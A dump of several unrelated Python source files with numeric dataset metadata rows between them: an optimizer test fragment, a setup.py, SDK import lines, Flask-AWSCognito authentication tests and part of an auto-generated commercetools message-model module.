        return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])

    def eq_con(x, l):
        return np.array([1 - 2 * x[0] * x[1] / 3, (3 * x[0] ** 2 - 4 * x[1]) / 3 + 1])

    x0 = np.array([0.5, 3.0])
    nil = np.array([])

    out = minimize(J, x0, nonlconineq=eq_con, method='SQP')

    assert abs(out['x'][0] - 1) < tol
    assert abs(out['x'][1] - 1.5) < tol
    assert abs(out['grad'][0] - 1) < tol
    assert abs(out['grad'][1] - 2) < tol
    assert abs(out['kkt'].inequality_nonlinear[0] - 2) < tol
    assert abs(out['kkt'].inequality_nonlinear[1] - 0.5) < tol
| 33.430769
| 86
| 0.503451
| 399
| 2,173
| 2.706767
| 0.120301
| 0.183333
| 0.244444
| 0.25
| 0.885185
| 0.874074
| 0.824074
| 0.824074
| 0.72037
| 0.72037
| 0
| 0.084507
| 0.248504
| 2,173
| 64
| 87
| 33.953125
| 0.576852
| 0
| 0
| 0.584906
| 0
| 0
| 0.032214
| 0
| 0
| 0
| 0
| 0
| 0.415094
| 1
| 0.188679
| false
| 0
| 0.037736
| 0.113208
| 0.339623
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
37d5fc60b60eb105b0531eb3444e6d04538009c9
| 1,301
|
py
|
Python
|
setup.py
|
vyathakavilocana/AIatNCStateSpring2021WeedDetectionProjectRepository
|
59616788360d4fbb7dee4dc65a0780fcd85e2c0b
|
[
"MIT"
] | null | null | null |
setup.py
|
vyathakavilocana/AIatNCStateSpring2021WeedDetectionProjectRepository
|
59616788360d4fbb7dee4dc65a0780fcd85e2c0b
|
[
"MIT"
] | null | null | null |
setup.py
|
vyathakavilocana/AIatNCStateSpring2021WeedDetectionProjectRepository
|
59616788360d4fbb7dee4dc65a0780fcd85e2c0b
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
setup(
    name='src',
    packages=find_packages(),
    version='0.1.0',
    description='This Spring 2021 AI at NC State project repository contains machine learning prototyping code for the Weed Detection project. Utilizing images and other geospatial data, it seeks to harness the power of applied AI models to distinguish weeds endemic to North Carolina from the grasses occupying the terrain of the state as well as provide alternative productive uses for the weeds (foraging, etc).',
    author='AI at NC State (Pratham Chhabria, Yuseung Kim, Jiale Hu, Sumitosh Pal, Prachi Jadhav, Jared Arriola) and Clemson AI Club (Jeffrey Wang)',
    license='MIT',
)
| 118.272727
| 1,010
| 0.61568
| 436
| 1,301
| 2.188073
| 0.201835
| 0.259958
| 0.383648
| 0.503145
| 0.468553
| 0.468553
| 0.468553
| 0.468553
| 0.468553
| 0.468553
| 0
| 0.00605
| 0.110684
| 1,301
| 10
| 1,011
| 130.1
| 0.684529
| 0
| 0
| 0
| 0
| 0.222222
| 0.873943
| 0.352037
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
37fd6fd8be4ae4ec501c6e40e7abb780aa34863d
| 360
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/muxings/progressive_webm/drm/speke/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/muxings/progressive_webm/drm/speke/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/muxings/progressive_webm/drm/speke/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.encodings.muxings.progressive_webm.drm.speke.speke_api import SpekeApi
from bitmovin_api_sdk.encoding.encodings.muxings.progressive_webm.drm.speke.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.encodings.muxings.progressive_webm.drm.speke.speke_drm_list_query_params import SpekeDrmListQueryParams
| 90
| 134
| 0.905556
| 49
| 360
| 6.346939
| 0.387755
| 0.115756
| 0.144695
| 0.173633
| 0.659164
| 0.659164
| 0.659164
| 0.659164
| 0.659164
| 0.659164
| 0
| 0
| 0.033333
| 360
| 3
| 135
| 120
| 0.893678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5303c90dea5fb99fa86c3e94754318be685fe5c8
| 2,891
|
py
|
Python
|
source/Flask-AWSCognito/tests/test_plugin.py
|
Frankovich73/tag-tamer-deployment-test
|
8267ff32bcae8de6b23d8566b719e00dc4879890
|
[
"Apache-2.0"
] | null | null | null |
source/Flask-AWSCognito/tests/test_plugin.py
|
Frankovich73/tag-tamer-deployment-test
|
8267ff32bcae8de6b23d8566b719e00dc4879890
|
[
"Apache-2.0"
] | null | null | null |
source/Flask-AWSCognito/tests/test_plugin.py
|
Frankovich73/tag-tamer-deployment-test
|
8267ff32bcae8de6b23d8566b719e00dc4879890
|
[
"Apache-2.0"
] | null | null | null |
import pytest

from flask_awscognito import AWSCognitoAuthentication


@pytest.mark.usefixtures("set_env")
def test_get_access_token(
    app, cognito_service_test_factory, token_service_test_factory
):
    plugin = AWSCognitoAuthentication(
        app,
        _token_service_factory=token_service_test_factory,
        _cognito_service_factory=cognito_service_test_factory,
    )
    with app.app_context():
        assert plugin.token_service
        assert plugin.cognito_service

        req_args = {"code": "code", "state": "dc0de448b88af41d1cd06387ac2d5102"}
        plugin.get_access_token(req_args)
        plugin.cognito_service.exchange_code_for_token.assert_called_with("code")


@pytest.mark.usefixtures("set_env")
def test_get_user_info(
    app, cognito_service_test_factory, token_service_test_factory, test_access_token
):
    plugin = AWSCognitoAuthentication(
        app,
        _token_service_factory=token_service_test_factory,
        _cognito_service_factory=cognito_service_test_factory,
    )
    with app.app_context():
        assert plugin.token_service
        assert plugin.cognito_service

        plugin.get_user_info(test_access_token)
        plugin.cognito_service.get_user_info.assert_called_with(test_access_token)


@pytest.mark.usefixtures("set_env")
def test_no_auth(
    app, cognito_service_test_factory, token_service_test_factory, client, test_view
):
    plugin = AWSCognitoAuthentication(
        app,
        _token_service_factory=token_service_test_factory,
        _cognito_service_factory=cognito_service_test_factory,
    )
    app.route("/")(plugin.authentication_required(test_view))

    res = client.get("/")

    assert res.status_code == 401
    assert res.json == {"message": "test"}


@pytest.mark.usefixtures("set_env")
def test_no_auth_bad_token(
    app, cognito_service_test_factory, token_service_test_factory, client, test_view
):
    plugin = AWSCognitoAuthentication(
        app,
        _token_service_factory=token_service_test_factory,
        _cognito_service_factory=cognito_service_test_factory,
    )
    app.route("/")(plugin.authentication_required(test_view))

    res = client.get("/", headers={"Authorization": "Bearer bad_token"})

    assert res.status_code == 401
    assert res.json == {"message": "test"}


@pytest.mark.usefixtures("set_env")
def test_auth(
    app, cognito_service_test_factory, token_service_test_factory, client, test_view
):
    plugin = AWSCognitoAuthentication(
        app,
        _token_service_factory=token_service_test_factory,
        _cognito_service_factory=cognito_service_test_factory,
    )
    app.route("/")(plugin.authentication_required(test_view))

    res = client.get("/", headers={"Authorization": "Bearer good_token"})

    assert res.status_code == 200
    assert res.json == {"data": 123}
| 36.594937
| 85
| 0.721896
| 333
| 2,891
| 5.810811
| 0.159159
| 0.113695
| 0.186047
| 0.129199
| 0.816021
| 0.801034
| 0.801034
| 0.801034
| 0.762791
| 0.714729
| 0
| 0.013208
| 0.18817
| 2,891
| 78
| 86
| 37.064103
| 0.811248
| 0
| 0
| 0.657143
| 0
| 0
| 0.062211
| 0.011376
| 0
| 0
| 0
| 0
| 0.171429
| 1
| 0.071429
| false
| 0
| 0.028571
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53529f7d068e33bbac53a47ded2518df8af2130f
| 236,317
|
py
|
Python
|
src/commercetools/platform/models/message.py
|
labd/commercetools-python-sdk
|
d8ec285f08d56ede2e4cad45c74833f5b609ab5c
|
[
"MIT"
] | 15
|
2018-11-02T14:35:52.000Z
|
2022-03-16T07:51:44.000Z
|
src/commercetools/platform/models/message.py
|
labd/commercetools-python-sdk
|
d8ec285f08d56ede2e4cad45c74833f5b609ab5c
|
[
"MIT"
] | 84
|
2018-11-02T12:50:32.000Z
|
2022-03-22T01:25:54.000Z
|
src/commercetools/platform/models/message.py
|
labd/commercetools-python-sdk
|
d8ec285f08d56ede2e4cad45c74833f5b609ab5c
|
[
"MIT"
] | 13
|
2019-01-03T09:16:50.000Z
|
2022-02-15T18:37:19.000Z
|
# This file is automatically generated by the rmf-codegen project.
#
# The Python code generator is maintained by Lab Digital. If you want to
# contribute to this project then please do not edit this file directly
# but send a pull request to the Lab Digital fork of rmf-codegen at
# https://github.com/labd/rmf-codegen
import datetime
import enum
import typing
from ._abstract import _BaseType
from .cart import DiscountCodeState, ProductPublishScope
from .common import BaseResource
from .order import OrderState, PaymentState, ReturnShipmentState, ShipmentState
from .payment import TransactionState
if typing.TYPE_CHECKING:
from .cart import (
DiscountCodeState,
DiscountedLineItemPriceForQuantity,
LineItem,
ProductPublishScope,
ShippingInfo,
ShippingRateInput,
TaxedItemPrice,
)
from .category import Category, CategoryReference
from .channel import ChannelReference
from .common import (
Address,
CreatedBy,
DiscountedPrice,
Image,
LastModifiedBy,
LocalizedString,
Money,
Reference,
)
from .customer import Customer, CustomerReference
from .customer_group import CustomerGroupReference
from .discount_code import DiscountCodeReference
from .inventory import InventoryEntry
from .order import (
Delivery,
DeliveryItem,
Order,
OrderState,
Parcel,
ParcelMeasurements,
PaymentState,
ReturnInfo,
ReturnShipmentState,
ShipmentState,
TrackingData,
)
from .order_edit import OrderEditApplied, OrderEditReference
from .payment import Payment, Transaction, TransactionState
from .product import ProductProjection, ProductVariant
from .review import Review
from .state import StateReference
from .store import StoreKeyReference
from .type import CustomFields
__all__ = [
"CategoryCreatedMessage",
"CategoryCreatedMessagePayload",
"CategorySlugChangedMessage",
"CategorySlugChangedMessagePayload",
"CustomLineItemStateTransitionMessage",
"CustomLineItemStateTransitionMessagePayload",
"CustomerAddressAddedMessage",
"CustomerAddressAddedMessagePayload",
"CustomerAddressChangedMessage",
"CustomerAddressChangedMessagePayload",
"CustomerAddressRemovedMessage",
"CustomerAddressRemovedMessagePayload",
"CustomerCompanyNameSetMessage",
"CustomerCompanyNameSetMessagePayload",
"CustomerCreatedMessage",
"CustomerCreatedMessagePayload",
"CustomerDateOfBirthSetMessage",
"CustomerDateOfBirthSetMessagePayload",
"CustomerEmailChangedMessage",
"CustomerEmailChangedMessagePayload",
"CustomerEmailVerifiedMessage",
"CustomerEmailVerifiedMessagePayload",
"CustomerGroupSetMessage",
"CustomerGroupSetMessagePayload",
"CustomerPasswordUpdatedMessage",
"CustomerPasswordUpdatedMessagePayload",
"DeliveryAddedMessage",
"DeliveryAddedMessagePayload",
"DeliveryAddressSetMessage",
"DeliveryAddressSetMessagePayload",
"DeliveryItemsUpdatedMessage",
"DeliveryItemsUpdatedMessagePayload",
"DeliveryRemovedMessage",
"DeliveryRemovedMessagePayload",
"InventoryEntryCreatedMessage",
"InventoryEntryCreatedMessagePayload",
"InventoryEntryDeletedMessage",
"InventoryEntryDeletedMessagePayload",
"InventoryEntryQuantitySetMessage",
"InventoryEntryQuantitySetMessagePayload",
"LineItemStateTransitionMessage",
"LineItemStateTransitionMessagePayload",
"Message",
"MessageConfiguration",
"MessageConfigurationDraft",
"MessagePagedQueryResponse",
"MessagePayload",
"OrderBillingAddressSetMessage",
"OrderBillingAddressSetMessagePayload",
"OrderCreatedMessage",
"OrderCreatedMessagePayload",
"OrderCustomLineItemDiscountSetMessage",
"OrderCustomLineItemDiscountSetMessagePayload",
"OrderCustomerEmailSetMessage",
"OrderCustomerEmailSetMessagePayload",
"OrderCustomerGroupSetMessage",
"OrderCustomerGroupSetMessagePayload",
"OrderCustomerSetMessage",
"OrderCustomerSetMessagePayload",
"OrderDeletedMessage",
"OrderDeletedMessagePayload",
"OrderDiscountCodeAddedMessage",
"OrderDiscountCodeAddedMessagePayload",
"OrderDiscountCodeRemovedMessage",
"OrderDiscountCodeRemovedMessagePayload",
"OrderDiscountCodeStateSetMessage",
"OrderDiscountCodeStateSetMessagePayload",
"OrderEditAppliedMessage",
"OrderEditAppliedMessagePayload",
"OrderImportedMessage",
"OrderImportedMessagePayload",
"OrderLineItemAddedMessage",
"OrderLineItemAddedMessagePayload",
"OrderLineItemDiscountSetMessage",
"OrderLineItemDiscountSetMessagePayload",
"OrderPaymentStateChangedMessage",
"OrderPaymentStateChangedMessagePayload",
"OrderReturnInfoAddedMessage",
"OrderReturnInfoAddedMessagePayload",
"OrderReturnShipmentStateChangedMessage",
"OrderReturnShipmentStateChangedMessagePayload",
"OrderShipmentStateChangedMessage",
"OrderShipmentStateChangedMessagePayload",
"OrderShippingAddressSetMessage",
"OrderShippingAddressSetMessagePayload",
"OrderShippingInfoSetMessage",
"OrderShippingInfoSetMessagePayload",
"OrderShippingRateInputSetMessage",
"OrderShippingRateInputSetMessagePayload",
"OrderStateChangedMessage",
"OrderStateChangedMessagePayload",
"OrderStateTransitionMessage",
"OrderStateTransitionMessagePayload",
"OrderStoreSetMessage",
"OrderStoreSetMessagePayload",
"ParcelAddedToDeliveryMessage",
"ParcelAddedToDeliveryMessagePayload",
"ParcelItemsUpdatedMessage",
"ParcelItemsUpdatedMessagePayload",
"ParcelMeasurementsUpdatedMessage",
"ParcelMeasurementsUpdatedMessagePayload",
"ParcelRemovedFromDeliveryMessage",
"ParcelRemovedFromDeliveryMessagePayload",
"ParcelTrackingDataUpdatedMessage",
"ParcelTrackingDataUpdatedMessagePayload",
"PaymentCreatedMessage",
"PaymentCreatedMessagePayload",
"PaymentInteractionAddedMessage",
"PaymentInteractionAddedMessagePayload",
"PaymentStatusInterfaceCodeSetMessage",
"PaymentStatusInterfaceCodeSetMessagePayload",
"PaymentStatusStateTransitionMessage",
"PaymentStatusStateTransitionMessagePayload",
"PaymentTransactionAddedMessage",
"PaymentTransactionAddedMessagePayload",
"PaymentTransactionStateChangedMessage",
"PaymentTransactionStateChangedMessagePayload",
"ProductAddedToCategoryMessage",
"ProductAddedToCategoryMessagePayload",
"ProductCreatedMessage",
"ProductCreatedMessagePayload",
"ProductDeletedMessage",
"ProductDeletedMessagePayload",
"ProductImageAddedMessage",
"ProductImageAddedMessagePayload",
"ProductPriceDiscountsSetMessage",
"ProductPriceDiscountsSetMessagePayload",
"ProductPriceDiscountsSetUpdatedPrice",
"ProductPriceExternalDiscountSetMessage",
"ProductPriceExternalDiscountSetMessagePayload",
"ProductPublishedMessage",
"ProductPublishedMessagePayload",
"ProductRemovedFromCategoryMessage",
"ProductRemovedFromCategoryMessagePayload",
"ProductRevertedStagedChangesMessage",
"ProductRevertedStagedChangesMessagePayload",
"ProductSlugChangedMessage",
"ProductSlugChangedMessagePayload",
"ProductStateTransitionMessage",
"ProductStateTransitionMessagePayload",
"ProductUnpublishedMessage",
"ProductUnpublishedMessagePayload",
"ProductVariantAddedMessage",
"ProductVariantAddedMessagePayload",
"ProductVariantDeletedMessage",
"ProductVariantDeletedMessagePayload",
"ReviewCreatedMessage",
"ReviewCreatedMessagePayload",
"ReviewRatingSetMessage",
"ReviewRatingSetMessagePayload",
"ReviewStateTransitionMessage",
"ReviewStateTransitionMessagePayload",
"ShoppingListStoreSetMessagePayload",
"UserProvidedIdentifiers",
]
class Message(BaseResource):
last_modified_by: typing.Optional["LastModifiedBy"]
created_by: typing.Optional["CreatedBy"]
sequence_number: int
resource: "Reference"
resource_version: int
type: str
resource_user_provided_identifiers: typing.Optional["UserProvidedIdentifiers"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
type: str,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None
):
self.last_modified_by = last_modified_by
self.created_by = created_by
self.sequence_number = sequence_number
self.resource = resource
self.resource_version = resource_version
self.type = type
self.resource_user_provided_identifiers = resource_user_provided_identifiers
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "Message":
if data["type"] == "CategoryCreated":
from ._schemas.message import CategoryCreatedMessageSchema
return CategoryCreatedMessageSchema().load(data)
if data["type"] == "CategorySlugChanged":
from ._schemas.message import CategorySlugChangedMessageSchema
return CategorySlugChangedMessageSchema().load(data)
if data["type"] == "CustomLineItemStateTransition":
from ._schemas.message import CustomLineItemStateTransitionMessageSchema
return CustomLineItemStateTransitionMessageSchema().load(data)
if data["type"] == "CustomerAddressAdded":
from ._schemas.message import CustomerAddressAddedMessageSchema
return CustomerAddressAddedMessageSchema().load(data)
if data["type"] == "CustomerAddressChanged":
from ._schemas.message import CustomerAddressChangedMessageSchema
return CustomerAddressChangedMessageSchema().load(data)
if data["type"] == "CustomerAddressRemoved":
from ._schemas.message import CustomerAddressRemovedMessageSchema
return CustomerAddressRemovedMessageSchema().load(data)
if data["type"] == "CustomerCompanyNameSet":
from ._schemas.message import CustomerCompanyNameSetMessageSchema
return CustomerCompanyNameSetMessageSchema().load(data)
if data["type"] == "CustomerCreated":
from ._schemas.message import CustomerCreatedMessageSchema
return CustomerCreatedMessageSchema().load(data)
if data["type"] == "CustomerDateOfBirthSet":
from ._schemas.message import CustomerDateOfBirthSetMessageSchema
return CustomerDateOfBirthSetMessageSchema().load(data)
if data["type"] == "CustomerEmailChanged":
from ._schemas.message import CustomerEmailChangedMessageSchema
return CustomerEmailChangedMessageSchema().load(data)
if data["type"] == "CustomerEmailVerified":
from ._schemas.message import CustomerEmailVerifiedMessageSchema
return CustomerEmailVerifiedMessageSchema().load(data)
if data["type"] == "CustomerGroupSet":
from ._schemas.message import CustomerGroupSetMessageSchema
return CustomerGroupSetMessageSchema().load(data)
if data["type"] == "CustomerPasswordUpdated":
from ._schemas.message import CustomerPasswordUpdatedMessageSchema
return CustomerPasswordUpdatedMessageSchema().load(data)
if data["type"] == "DeliveryAdded":
from ._schemas.message import DeliveryAddedMessageSchema
return DeliveryAddedMessageSchema().load(data)
if data["type"] == "DeliveryAddressSet":
from ._schemas.message import DeliveryAddressSetMessageSchema
return DeliveryAddressSetMessageSchema().load(data)
if data["type"] == "DeliveryItemsUpdated":
from ._schemas.message import DeliveryItemsUpdatedMessageSchema
return DeliveryItemsUpdatedMessageSchema().load(data)
if data["type"] == "DeliveryRemoved":
from ._schemas.message import DeliveryRemovedMessageSchema
return DeliveryRemovedMessageSchema().load(data)
if data["type"] == "InventoryEntryCreated":
from ._schemas.message import InventoryEntryCreatedMessageSchema
return InventoryEntryCreatedMessageSchema().load(data)
if data["type"] == "InventoryEntryDeleted":
from ._schemas.message import InventoryEntryDeletedMessageSchema
return InventoryEntryDeletedMessageSchema().load(data)
if data["type"] == "InventoryEntryQuantitySet":
from ._schemas.message import InventoryEntryQuantitySetMessageSchema
return InventoryEntryQuantitySetMessageSchema().load(data)
if data["type"] == "LineItemStateTransition":
from ._schemas.message import LineItemStateTransitionMessageSchema
return LineItemStateTransitionMessageSchema().load(data)
if data["type"] == "OrderBillingAddressSet":
from ._schemas.message import OrderBillingAddressSetMessageSchema
return OrderBillingAddressSetMessageSchema().load(data)
if data["type"] == "OrderCreated":
from ._schemas.message import OrderCreatedMessageSchema
return OrderCreatedMessageSchema().load(data)
if data["type"] == "OrderCustomLineItemDiscountSet":
from ._schemas.message import OrderCustomLineItemDiscountSetMessageSchema
return OrderCustomLineItemDiscountSetMessageSchema().load(data)
if data["type"] == "OrderCustomerEmailSet":
from ._schemas.message import OrderCustomerEmailSetMessageSchema
return OrderCustomerEmailSetMessageSchema().load(data)
if data["type"] == "OrderCustomerGroupSet":
from ._schemas.message import OrderCustomerGroupSetMessageSchema
return OrderCustomerGroupSetMessageSchema().load(data)
if data["type"] == "OrderCustomerSet":
from ._schemas.message import OrderCustomerSetMessageSchema
return OrderCustomerSetMessageSchema().load(data)
if data["type"] == "OrderDeleted":
from ._schemas.message import OrderDeletedMessageSchema
return OrderDeletedMessageSchema().load(data)
if data["type"] == "OrderDiscountCodeAdded":
from ._schemas.message import OrderDiscountCodeAddedMessageSchema
return OrderDiscountCodeAddedMessageSchema().load(data)
if data["type"] == "OrderDiscountCodeRemoved":
from ._schemas.message import OrderDiscountCodeRemovedMessageSchema
return OrderDiscountCodeRemovedMessageSchema().load(data)
if data["type"] == "OrderDiscountCodeStateSet":
from ._schemas.message import OrderDiscountCodeStateSetMessageSchema
return OrderDiscountCodeStateSetMessageSchema().load(data)
if data["type"] == "OrderEditApplied":
from ._schemas.message import OrderEditAppliedMessageSchema
return OrderEditAppliedMessageSchema().load(data)
if data["type"] == "OrderImported":
from ._schemas.message import OrderImportedMessageSchema
return OrderImportedMessageSchema().load(data)
if data["type"] == "OrderLineItemAdded":
from ._schemas.message import OrderLineItemAddedMessageSchema
return OrderLineItemAddedMessageSchema().load(data)
if data["type"] == "OrderLineItemDiscountSet":
from ._schemas.message import OrderLineItemDiscountSetMessageSchema
return OrderLineItemDiscountSetMessageSchema().load(data)
if data["type"] == "OrderPaymentStateChanged":
from ._schemas.message import OrderPaymentStateChangedMessageSchema
return OrderPaymentStateChangedMessageSchema().load(data)
if data["type"] == "ReturnInfoAdded":
from ._schemas.message import OrderReturnInfoAddedMessageSchema
return OrderReturnInfoAddedMessageSchema().load(data)
if data["type"] == "OrderReturnShipmentStateChanged":
from ._schemas.message import OrderReturnShipmentStateChangedMessageSchema
return OrderReturnShipmentStateChangedMessageSchema().load(data)
if data["type"] == "OrderShipmentStateChanged":
from ._schemas.message import OrderShipmentStateChangedMessageSchema
return OrderShipmentStateChangedMessageSchema().load(data)
if data["type"] == "OrderShippingAddressSet":
from ._schemas.message import OrderShippingAddressSetMessageSchema
return OrderShippingAddressSetMessageSchema().load(data)
if data["type"] == "OrderShippingInfoSet":
from ._schemas.message import OrderShippingInfoSetMessageSchema
return OrderShippingInfoSetMessageSchema().load(data)
if data["type"] == "OrderShippingRateInputSet":
from ._schemas.message import OrderShippingRateInputSetMessageSchema
return OrderShippingRateInputSetMessageSchema().load(data)
if data["type"] == "OrderStateChanged":
from ._schemas.message import OrderStateChangedMessageSchema
return OrderStateChangedMessageSchema().load(data)
if data["type"] == "OrderStateTransition":
from ._schemas.message import OrderStateTransitionMessageSchema
return OrderStateTransitionMessageSchema().load(data)
if data["type"] == "OrderStoreSet":
from ._schemas.message import OrderStoreSetMessageSchema
return OrderStoreSetMessageSchema().load(data)
if data["type"] == "ParcelAddedToDelivery":
from ._schemas.message import ParcelAddedToDeliveryMessageSchema
return ParcelAddedToDeliveryMessageSchema().load(data)
if data["type"] == "ParcelItemsUpdated":
from ._schemas.message import ParcelItemsUpdatedMessageSchema
return ParcelItemsUpdatedMessageSchema().load(data)
if data["type"] == "ParcelMeasurementsUpdated":
from ._schemas.message import ParcelMeasurementsUpdatedMessageSchema
return ParcelMeasurementsUpdatedMessageSchema().load(data)
if data["type"] == "ParcelRemovedFromDelivery":
from ._schemas.message import ParcelRemovedFromDeliveryMessageSchema
return ParcelRemovedFromDeliveryMessageSchema().load(data)
if data["type"] == "ParcelTrackingDataUpdated":
from ._schemas.message import ParcelTrackingDataUpdatedMessageSchema
return ParcelTrackingDataUpdatedMessageSchema().load(data)
if data["type"] == "PaymentCreated":
from ._schemas.message import PaymentCreatedMessageSchema
return PaymentCreatedMessageSchema().load(data)
if data["type"] == "PaymentInteractionAdded":
from ._schemas.message import PaymentInteractionAddedMessageSchema
return PaymentInteractionAddedMessageSchema().load(data)
if data["type"] == "PaymentStatusInterfaceCodeSet":
from ._schemas.message import PaymentStatusInterfaceCodeSetMessageSchema
return PaymentStatusInterfaceCodeSetMessageSchema().load(data)
if data["type"] == "PaymentStatusStateTransition":
from ._schemas.message import PaymentStatusStateTransitionMessageSchema
return PaymentStatusStateTransitionMessageSchema().load(data)
if data["type"] == "PaymentTransactionAdded":
from ._schemas.message import PaymentTransactionAddedMessageSchema
return PaymentTransactionAddedMessageSchema().load(data)
if data["type"] == "PaymentTransactionStateChanged":
from ._schemas.message import PaymentTransactionStateChangedMessageSchema
return PaymentTransactionStateChangedMessageSchema().load(data)
if data["type"] == "ProductAddedToCategory":
from ._schemas.message import ProductAddedToCategoryMessageSchema
return ProductAddedToCategoryMessageSchema().load(data)
if data["type"] == "ProductCreated":
from ._schemas.message import ProductCreatedMessageSchema
return ProductCreatedMessageSchema().load(data)
if data["type"] == "ProductDeleted":
from ._schemas.message import ProductDeletedMessageSchema
return ProductDeletedMessageSchema().load(data)
if data["type"] == "ProductImageAdded":
from ._schemas.message import ProductImageAddedMessageSchema
return ProductImageAddedMessageSchema().load(data)
if data["type"] == "ProductPriceDiscountsSet":
from ._schemas.message import ProductPriceDiscountsSetMessageSchema
return ProductPriceDiscountsSetMessageSchema().load(data)
if data["type"] == "ProductPriceExternalDiscountSet":
from ._schemas.message import ProductPriceExternalDiscountSetMessageSchema
return ProductPriceExternalDiscountSetMessageSchema().load(data)
if data["type"] == "ProductPublished":
from ._schemas.message import ProductPublishedMessageSchema
return ProductPublishedMessageSchema().load(data)
if data["type"] == "ProductRemovedFromCategory":
from ._schemas.message import ProductRemovedFromCategoryMessageSchema
return ProductRemovedFromCategoryMessageSchema().load(data)
if data["type"] == "ProductRevertedStagedChanges":
from ._schemas.message import ProductRevertedStagedChangesMessageSchema
return ProductRevertedStagedChangesMessageSchema().load(data)
if data["type"] == "ProductSlugChanged":
from ._schemas.message import ProductSlugChangedMessageSchema
return ProductSlugChangedMessageSchema().load(data)
if data["type"] == "ProductStateTransition":
from ._schemas.message import ProductStateTransitionMessageSchema
return ProductStateTransitionMessageSchema().load(data)
if data["type"] == "ProductUnpublished":
from ._schemas.message import ProductUnpublishedMessageSchema
return ProductUnpublishedMessageSchema().load(data)
if data["type"] == "ProductVariantAdded":
from ._schemas.message import ProductVariantAddedMessageSchema
return ProductVariantAddedMessageSchema().load(data)
if data["type"] == "ProductVariantDeleted":
from ._schemas.message import ProductVariantDeletedMessageSchema
return ProductVariantDeletedMessageSchema().load(data)
if data["type"] == "ReviewCreated":
from ._schemas.message import ReviewCreatedMessageSchema
return ReviewCreatedMessageSchema().load(data)
if data["type"] == "ReviewRatingSet":
from ._schemas.message import ReviewRatingSetMessageSchema
return ReviewRatingSetMessageSchema().load(data)
if data["type"] == "ReviewStateTransition":
from ._schemas.message import ReviewStateTransitionMessageSchema
return ReviewStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessageSchema
return MessageSchema().dump(self)
class CategoryCreatedMessage(Message):
category: "Category"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
category: "Category"
):
self.category = category
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CategoryCreated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategoryCreatedMessage":
from ._schemas.message import CategoryCreatedMessageSchema
return CategoryCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategoryCreatedMessageSchema
return CategoryCreatedMessageSchema().dump(self)
class CategorySlugChangedMessage(Message):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
slug: "LocalizedString",
